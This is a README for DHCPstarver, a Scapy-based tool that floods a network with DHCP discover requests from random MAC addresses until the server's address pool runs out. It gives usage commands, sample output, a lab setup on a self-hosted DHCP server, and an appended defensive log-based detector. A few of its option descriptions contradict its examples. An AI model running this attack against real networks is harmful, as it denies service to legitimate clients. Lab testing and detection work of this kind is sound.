JeSappelleRoot/DHCPStarver

DHCPStarver

DHCPstarver is a tool to perform a DHCP starvation attack.

####################################################
# This tool is designed for educational purposes only #
####################################################

Requirements

DHCPstarver uses several libraries:

  • netaddr to manage the subnet and iterate over available hosts
  • argparse to manage command line arguments
  • netifaces to get all available interfaces
  • scapy to craft DHCP discover requests
  • termcolor to add color in your bland and dull terminal (huhu, just kidding)

Requirement file

netaddr==0.7.19
argparse==1.2.1
netifaces==0.10.4
scapy==2.4.3
termcolor==1.1.0

Just run pip3 install -r requirements.txt to install all modules needed by DHCPstarver

Some sources - Thanks to

Special thanks

Thanks to D@da for his regex (unfortunately not used, but appreciated!)

re.findall('([0-9]*.[0-9]*.[0-9]*.[0-9]*):bootpc /', str(answer))

See the end of the makeDHCPRequest() function

Command line arguments

DHCPstarver needs some arguments:

  • -i to specify the interface which will be used to make DHCP discover requests
    DHCPstarver checks that the interface exists before making a request

  • -s to specify a subnet, in CIDR notation
    A DHCP discover request implies that the client doesn't have an IP address yet, but the subnet is used to loop over each IP address available on a DHCP server

  • -t to set a specific timeout for each DHCP discover request (default is 0)

  • -r to set the number of retries for each DHCP discover request (default is 0, only 1 DHCP discover)
    If the number of retries is equal to 0, the value is increased to 1, because Scapy needs to make at least one request

  • -d to make Scapy more verbose; it only adds verbose = True to the requests crafted with Scapy

How DHCPstarver makes DHCP discover requests

DHCP discover is the first request a host sends when no IP address is set.
The client crafts a request with:

At layer 2

  • source hardware (MAC) address (random with DHCPstarver, generated by the RandMAC() function in Scapy)
  • ff:ff:ff:ff:ff:ff destination MAC address (broadcast address for layer 2)

At layer 3

  • 0.0.0.0 source IP address
  • 255.255.255.255 destination IP address (broadcast for layer 3)

Different modes of use

DHCPstarver can be used in fast mode or in a slower, more verbose mode.

Slow mode is only available if the timeout is greater than 4 and the number of retries is greater than 1

It is arbitrarily assumed that when neither a timeout nor a number of retries is specified, the minimum amount of information is wanted

Slow mode

To use DHCPstarver in slow mode, just specify:

  • a timeout greater than 4, at minimum -t 5
  • a number of retries greater than 1, at minimum -r 1

Slow mode automatically increases the verbosity, to display a received DHCP offer with:

  • the offered IP address
  • information about the DHCP server (MAC address, IP address)

Note that several DHCP servers can respond, due to multi = True in the request crafted with Scapy

Sometimes Scapy doesn't seem to receive DHCP offers, although they can be seen with a standard sniffer (TCPDump, Wireshark...)

Example

With the command line sudo python3 DHCPStarver.py -i vboxnet0 -r 3 -s 10.0.10.0/24 -t 5 -r 3 :

     _____  _    _  _____ _____     _                            
    |  __ \| |  | |/ ____|  __ \   | |                           
    | |  | | |__| | |    | |__) |__| |_ __ _ _ ____   _____ _ __ 
    | |  | |  __  | |    |  ___/ __| __/ _` | '__\ \ / / _ \ '__|
    | |__| | |  | | |____| |   \__ \ || (_| | |   \ V /  __/ |   
    |_____/|_|  |_|\_____|_|   |___/\__\__,_|_|    \_/ \___|_|   
                                                                        
    
[+] Craft and send frame with 73:81:34:af:8f:fe mac address
- send frame [1/3]
[+] DHCP offer : 10.0.10.180 (from 08:00:27:00:8c:ce - 10.0.10.10)

[+] Craft and send frame with f9:f1:ee:0c:b0:f4 mac address
- send frame [1/3]
[+] DHCP offer : 10.0.10.181 (from 08:00:27:00:8c:ce - 10.0.10.10)

[+] Craft and send frame with e0:c5:a7:bb:98:38 mac address
- send frame [1/3]
- send frame [2/3]
- send frame [3/3]
[-] Scapy failed to recover DHCP offer, may be with another sniffer...

[+] Craft and send frame with 4e:c3:fe:ac:f5:02 mac address
- send frame [1/3]
- send frame [2/3]
- send frame [3/3]
[-] Scapy failed to recover DHCP offer, may be with another sniffer...

[+] Craft and send frame with e5:02:46:3d:3d:a4 mac address
- send frame [1/3]
[+] DHCP offer : 10.0.10.188 (from 08:00:27:00:8c:ce - 10.0.10.10)

[...]

Fast mode

Fast mode can be used with:

  • a timeout set lower than 5, at minimum -t 4
  • a number of retries lower than 2, at minimum -r 1

Example

With the command line sudo python3 DHCPStarver.py -i vboxnet0 -r 3 -s 10.0.10.0/24 :


     _____  _    _  _____ _____     _                            
    |  __ \| |  | |/ ____|  __ \   | |                           
    | |  | | |__| | |    | |__) |__| |_ __ _ _ ____   _____ _ __ 
    | |  | |  __  | |    |  ___/ __| __/ _` | '__\ \ / / _ \ '__|
    | |__| | |  | | |____| |   \__ \ || (_| | |   \ V /  __/ |   
    |_____/|_|  |_|\_____|_|   |___/\__\__,_|_|    \_/ \___|_|   
                                                                        
    
[+] Craft and send frame with 4d:f0:3a:fa:ca:4b mac address
[+] Craft and send frame with c3:ab:d6:82:4d:d6 mac address
[+] Craft and send frame with fa:7d:53:4c:e6:24 mac address
[+] Craft and send frame with 29:d8:93:c5:16:28 mac address
[+] Craft and send frame with 14:fe:ad:5b:00:ca mac address
[+] Craft and send frame with 94:04:0e:e8:17:92 mac address
[+] Craft and send frame with c7:6e:bc:62:3f:56 mac address
[+] Craft and send frame with 8a:b8:a9:4b:b0:47 mac address
[+] Craft and send frame with 0c:db:96:03:c6:e8 mac address
[+] Craft and send frame with 4a:f0:38:98:14:fd mac address
[+] Craft and send frame with 74:a9:87:14:9e:ba mac address
[+] Craft and send frame with d4:81:9d:1f:a3:da mac address

[...]

How to test DHCPstarver on your own DHCP server (virtual machine here)

On your favorite Linux distribution, you can install isc-dhcp-server.
On a Debian distribution, just run apt-get install isc-dhcp-server to install it.

In /etc/dhcp/dhcpd.conf, set the content to something like:

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.10.0 netmask 255.255.255.0 {

        range 10.0.10.100 10.0.10.200;
        option broadcast-address 10.0.10.255;
        option routers 10.0.10.254;

}

This content creates a DHCP pool for the 10.0.10.0/24 subnet:

  • IP pool starts at 10.0.10.100
  • IP pool ends at 10.0.10.200
  • Broadcast address is 10.0.10.255
  • The default gateway will be 10.0.10.254

In /etc/default/isc-dhcp-server, set the value INTERFACESv4="" to the interface on which your DHCP server will listen for requests.
In my case, the value is INTERFACESv4="enp0s3" (depends on your context)

Finally, use the service isc-dhcp-server command to start your DHCP server

Side of a DHCP server

If the starvation attack is completed, the DHCP server logs look like:

root@dhcpSRV:/var/log# tail -f syslog|grep --color dhcpd

Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 30:65:3a:31:62:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 66:35:3a:36:31:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 34:30:3a:30:31:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 63:39:3a:37:32:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 36:31:3a:31:33:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 63:36:3a:32:63:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 36:37:3a:38:65:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 62:32:3a:65:62:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 32:65:3a:30:65:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 61:61:3a:37:30:3a via enp0s3: network 10.0.10.0/24: no free leases

[...]

At this point, the pool is exhausted and a client can no longer obtain any IP address
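On the server side, the log pattern above is what a defender can alert on. The following is an added example, not part of DHCPstarver: it parses dhcpd syslog lines and raises an alert when many distinct client MAC addresses hit "no free leases" on one interface within a short window. The function names, thresholds and sample lines (built from the log format above) are assumptions of this example; it also counts hardware addresses whose bytes decode to ASCII text, as the ones in the log above do (30:65:3a:31:62:3a is the text "0e:1b:").

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the dhcpd syslog format shown above (first line is a benign client).
SAMPLE_LOG = """\
Oct 24 13:36:20 dhcpSRV dhcpd[414]: DHCPDISCOVER from 08:00:27:aa:bb:01 via enp0s3
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 30:65:3a:31:62:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 66:35:3a:36:31:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 34:30:3a:30:31:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 36:37:3a:38:65:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 62:32:3a:65:62:3a via enp0s3: network 10.0.10.0/24: no free leases
"""

# Only DISCOVERs that the server could not serve are of interest here.
LINE_RE = re.compile(
    r"^(\w{3} +\d+ [\d:]{8}) \S+ dhcpd\[\d+\]: DHCPDISCOVER from "
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) via (\S+?): network (\S+): no free leases$")

def is_ascii_text_mac(mac):
    """True if all six octets are ASCII hex digits or ':' (a MAC string, not MAC bytes)."""
    return all(chr(int(octet, 16)) in "0123456789abcdefABCDEF:" for octet in mac.split(":"))

def detect_starvation(log_text, window_s=10, min_macs=5, year=2000):
    """Return one alert per (interface, network) whose distinct 'no free leases'
    client MACs reach min_macs inside any window_s-second span."""
    events = defaultdict(list)  # (iface, network) -> [(time, mac)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            # syslog omits the year; 'year' is an assumed value, used only for time deltas
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events[(m.group(3), m.group(4))].append((ts, m.group(2)))
    alerts = []
    for (iface, network), seen in events.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            end = start + timedelta(seconds=window_s)
            macs = {mac for ts, mac in seen[i:] if ts <= end}
            if len(macs) >= min_macs:
                alerts.append({"iface": iface, "network": network,
                               "start": start.strftime("%b %d %H:%M:%S"),
                               "distinct_macs": len(macs),
                               "ascii_text_macs": sum(map(is_ascii_text_mac, macs))})
                break  # one alert per (interface, network) is enough
    return alerts

if __name__ == "__main__":
    for alert in detect_starvation(SAMPLE_LOG):
        print(alert)
```

The window and threshold should be tuned to the normal DISCOVER rate of the segment; a single client that retries with one MAC address never reaches the distinct-MAC threshold.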
